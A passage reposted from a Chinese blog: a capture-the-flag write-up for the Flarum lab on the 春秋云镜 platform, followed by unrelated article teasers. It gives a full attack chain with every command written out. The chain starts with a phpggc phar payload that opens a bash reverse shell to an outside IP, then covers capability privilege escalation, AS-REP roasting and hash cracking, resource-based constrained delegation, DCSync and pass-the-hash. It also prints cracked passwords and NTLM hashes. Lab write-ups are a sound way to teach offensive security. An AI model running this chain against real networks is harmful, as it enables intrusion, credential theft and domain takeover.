春秋云镜 Flarum

news/2024/11/17 11:21:25/文章来源:https://www.cnblogs.com/meraklbz/p/18390092

访问发现是个Flarum CMS框架.
image

使用rockyou.txt爆破administrator得到密码1chris,登录后台
由于题目提示Flarum上执行任意命令,搜到了P牛的文章
照着打反序列化.
执行命令

./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.57.23.40/1111 0>&1'"

生成tar格式的phar文件包
将得到的base64替换
@import (inline) 'data:text/css;base64,xxx';中的xxx
然后复制到后台修改css处
image

并保存.然后访问主页确保css成功刷新.再次重新修改css,对我们的phar进行文件包含.

.test {content: data-uri('phar://./assets/forum.css');
}

点击保存会卡一会,然后成功弹shell
发现没有root文件夹查看权限,
没法suid提权,这里需要使用capability提权

getcap -r / 2>/dev/null

image

这里的openssl可以提权

openssl enc -in "/root/flag/flag01.txt"

得到第一个flag: flag{2f62c0ea-121e-40f2-ba75-9c8368a2a89a}
传个代理,传个fscan去扫描

172.22.60.8:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.8:88 open
[*] NetInfo:
[*]172.22.60.42[->]Fileserver[->]172.22.60.42[->]169.254.83.27
[*] NetInfo:
[*]172.22.60.8[->]DC[->]172.22.60.8[->]169.254.42.35
[*] NetBios: 172.22.60.8     [+]DC XIAORANG\DC              
[*] NetBios: 172.22.60.15    XIAORANG\PC1                   
[*] NetInfo:
[*]172.22.60.15[->]PC1[->]172.22.60.15[->]169.254.178.145
[*] NetBios: 172.22.60.42    XIAORANG\FILESERVER            
[*] WebTitle: http://172.22.60.52       code:200 len:5867   title:霄壤社区

之前登录后台的时候看到了一堆用户和邮箱.
image

然而不是很方便去导下来.我们登录后台数据库去处理.
查看config文件获取数据库登录的账号和密码.
image

使用nvcat登陆将指定列导出(我蚁剑,nvcat啥的都没成功,手动一点一点打的)
打一个AS-REQ Roasting

proxychains impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab/ -usersfile flarum_users.txt

得到

$krb5asrep$23$wangyun@XIAORANG.LAB:7113eff57f6a311ae31c6954239295c4$6d61457220f4a148bdb66b2eb60186c19fb59036b11408b4a16030a55f2e578917decac987e4bef1e5b758211a8a6657d7dcd7497a4f9f8d8574f19080146e794982c7dc0b9b86510cadc4c3ff84a7afef6fd51000c46cba3868799e5fe89a824acb90903b5e5a5da72503f30a8c9d016f298b2d3686bb75abfc48a7a2d31adc45600d6718c8b8b9712855c5f157c64f163e24fba17b0f926a62821344782e519d392da64129562cc04d0a098cdfb9d3c0101519c3b6c359467e061672ddde3853fa0101e1d6fa384cb4df313b6b6c4b0c8c8269f54dc9a4f04392ea6ad7c37084f0e3519e827a66f113f86b
$krb5asrep$23$zhangxin@XIAORANG.LAB:6a1df11dffef818977a03d01e7e34240$cc37025841b68c245336912104d4a4f0585c81685912feb5a08fe36e2c38e3ff550cc2902b8d7af2ad2846b4f6e9f785691b06d036c2941003af6eb13317da739a7fbd9779629345134d2d15b641684e477834e24eb9dc1fce6c912d9655813526175a3de0af09d778072cf2be2e7ef1d15e0b57850ebcb2e549d9e1638dde0f5f6809cd880635c759cf5074c238179b5377e5735b01be55b68f3f339eebe4382722d061b070ac328f912b2118efdafa99f81f5a7260ec253bafca4ebacae63e86627a20a2b80e5e1fd326a537d8c5d88a95273584549e47af14b54ee36a3c99244ef1405164903d963e4593

随便挑一个用户去爆一下

hashcat -m 18200 --force -a 0 '哈希'  /usr/share/wordlists/rockyou.txt

爆破得到用户名和密码wangyun@XIAORANG.LAB/Adm12geC
用这个用户名和密码跑一下bloodhound

proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

image

发现用户zhangxin是Account Operator,对FileServer 有GenericAll权限.我们可以去打一个RBCD提权.
首先要有zhangxin的用户才行.我们先扫一下这个172.22.60.15看看
image

发现开了3389,rdp上去,发现有个xshell.我们点击提示让我们更新.这就没法玩了...
image

看wp知道要抓xshell的账号密码.
传个SharpXDecrypt去跑一下
image

成功抓到了zhangxin的密码admin4qwY38cc
接下来打RBCD,尝试按照网鼎杯半决赛的打
添加机器账户01

proxychains python3 addcomputer.py -method SAMR xiaorang.lab/zhangxin:admin4qwY38cc -computer-name 01\$ -computer-pass Passw0rd -dc-ip 172.22.60.8

传个powerview.ps1上去抓取机器账户sid

Import-Module .\PowerView.ps1
Get-NetComputer 01 -Properties objectsid

image

sid:S-1-5-21-3535393121-624993632-895678587-1116
修改172.22.60.42(FILESERVER)机器的msDS-AllowedToActOnBehalfOfOtherIdentity属性,使其指向01

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer FILESERVER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

image

伪造一个Administrator的ST

proxychains impacket-getST xiaorang.lab/01\$:Passw0rd -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator -dc-ip 172.22.60.8

导入票据

export KRB5CCNAME==administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccache

改hosts,哈希横传登录

proxychains python3 ~/CTFtools/impacket/examples/psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk

成功得到shell
image

flag:flag{c2385619-1870-4cbe-99d9-5c2a7e3e110d}
此时获得的是机器的管理员权限,可以直接DCSync(Bloodhound中有提示可以)
抓一下这个FIlESERVER的哈希

proxychains python3 secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

image

其中FILESERVER的NTLM是XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
进行DCSync攻击

proxychains ~/CTFtools/impacket/examples/secretsdump.py xiaorang.lab/'FILESERVER$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator 

image

c3cfdc08527ec4ab6aa3e630e79d349b就是域控的哈希
使用哈希横传去拿PC1的哈希

proxychains crackmapexec smb 172.22.60.15 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"

flag:flag{4a616538-8131-4d7e-9bd3-2452c232de32}

proxychains crackmapexec smb 172.22.60.8 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"

flag:flag{48fb52f2-e15d-473d-85b9-4889e1e136f6}
image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/790049.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Qt/C++地址转坐标/坐标转地址/逆地址解析/支持百度高德腾讯和天地图

一、前言说明 地址和经纬度坐标转换的功能必须在线使用,一般用在导航需求上,比如用户输入起点地址和终点地址,查询路线后,显示对应的路线,而实际上各大地图厂家默认支持的是给定经纬度坐标来查询(百度地图支持传入地址),但是你让用户输入经纬度坐标是不可能的,他肯定不…

Ethercat设备数据 转IEC61850项目案例

目录 1 案例说明 1 2 VFBOX网关工作原理 1 3 准备工作 2 5 设置网关采集ETHERCAT数据 5 6 用IEC61850协议转发数据 7 7 网关使用多个逻辑设备和逻辑节点的方法 9 8 安装NPCAP 10 9 案例总结 11 1 案例说明设置网关采集EtherCAT设备数据 把采集的数据转成IEC61850协议转发给其他…

若依如何修改logo

若依在我看来封装得很完善,但是也包了很多层,想修改logo找了好久找不对,做个笔记下次才好找 修改标题旁的logo title的logo图片存放在src>assets>logo文件下,修改的位置在layout>components>sidebar下的logo.vue修改URL上的logo

Hexo + redefine主题配置个人博客

前置准备安装 node js 安装 git 安装 Hexo 创建 Github 仓库。node js: https://nodejs.org/zh-cngit: 注:git 安装时一直继续就好,但是有 path 的地方一定要勾选。 https://git-scm.com/download/win检查一下是否安装成功,在终端中输入: node -v npm -v git --versionHe…

Linux监控性能调优分析-perf(3)火焰图

10 火焰图(flamegraph) perf火焰图是一种可视化性能分析工具,它通过将性能数据绘制成一个类似火焰的图,直观地展示了程序的调用栈,帮助开发者快速定位性能瓶颈。特点如下:可视化性能数据:火焰图将性能数据映射到一个二维的图中,横轴表示采样时间,纵轴表示调用栈。 火焰…

安全:iptables中的表和链的区别

一,什么是链? 1,一个防火墙中通常针对不同的来源设置很多规则,多个规则形成一个链,其实也可以理解成是分组的概念,在Iptables防火墙中针对不同的链路共分为五种不同的链。 如下图所示,当数据报文进入链之后,首先匹配第一条规则,如果第一条规则通过则访问,如果不匹配,…

Gluon 编译 JavaFx - exe

Gluon 编译 JavaFx -> exe 能力强的伙伴可以直接参考官方文档 开发工具idea 2023.3 idea gluon plugin git apache-maven-3.8.4环境准备vs 2022 community 版本 (使用微软官方的安装器安装,社区版即可) jdk 11 or 17+ (可以使用idea进行下载安装) GraalVM CE Gluon 22.1.…

8.4linux定时任务-环境变量-数据库

配合SUID本地环境变量提权 思路原理:利用sh环境变量替换,使得/tmp/ps得到root权限;ps=sh 过程:手写调用文件-编译-复制文件-增加环境变量-执行 gcc demon1.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH # webshell权限无法设置环境变量 ./shell id提前本地定时任…

代码随想录day46 || 647 回文子串, 516 最长回文子序列

647 回文字串func countSubstrings(s string) int {// 动规五部曲// dp[i][j] 表示s[i: j+1] 区间是否是一个回文// if s[i] == s[j] {if i-j <= 1 || dp[i+1][j-1] == true { dp[i][j] == true}}// 初始化为false// 从下往上,从左往右// printvar count intvar dp = make(…

vivo手机导出微信聊天记录方法

1,先在手机上打开“开发人员选项”并将USB调试功能打开。再将手机通过数据线连接到电脑,打开电脑上已经安装好的“互传备份助手”(点击此处进入下载页面),再点击界面上的新建备份。注意:在电脑上运行互传备份助手时,会提醒手机上也要安装互传助手,按提示安装即可。 2,…

PHP之常见问题

汇总在PHP开发中遇到的一些问题 1.post提交参数缺失 场景: 在前端页面发起一个post提交的时候,查看payload中的数据是正常的, 但是在接收的时候,发现只有部分数据,算了一下,包含的数据数量只有1000个 解决: 默认配置里的数据量配置太小造成的这个问题,需要修改一下配置;只需要修…